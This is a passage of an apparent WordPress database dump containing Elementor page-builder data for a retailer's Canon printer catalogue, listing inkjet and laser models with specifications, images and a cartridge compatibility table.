width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6829,3289,'_elementor_edit_mode','builder'),(6828,3289,'_wp_page_template','template-fullwidth.php'),(6832,3289,'_elementor_version','0.4'),(6835,3290,'_wp_page_template','template-fullwidth.php'),(6836,3290,'_elementor_edit_mode','builder'),(6837,3290,'_elementor_template_type','post'),(6838,3290,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\\n\\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\\n\\nPrint, Scan, Copy, Fax\\n\\nISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour\\n\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\\n\\nRecommended print volume: 50 - 200 pages\\n\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL 